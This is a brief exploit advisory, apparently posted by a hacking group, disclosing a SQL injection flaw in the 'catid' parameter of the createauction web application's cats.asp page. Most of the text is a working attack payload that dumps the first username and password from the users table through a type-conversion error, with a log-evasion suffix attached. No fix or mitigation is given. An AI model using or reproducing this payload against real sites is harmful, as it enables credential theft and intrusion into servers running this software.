createauction (catid) Remote SQL Injection Vulnerability ============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina #----------------------------------------------------------- # Software: createauction # Vendor : http://www.createauction.com/ # Method: SQL Injection # Thanks To : akukasih,nyubi,irvian and all #hitamputih crew # [[SQL]]]--------------------------------------------------------- http://[target]/[path]/cats.asp?catid=[SQL] ex: http://[target]/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))--sp_password #########################################################################################
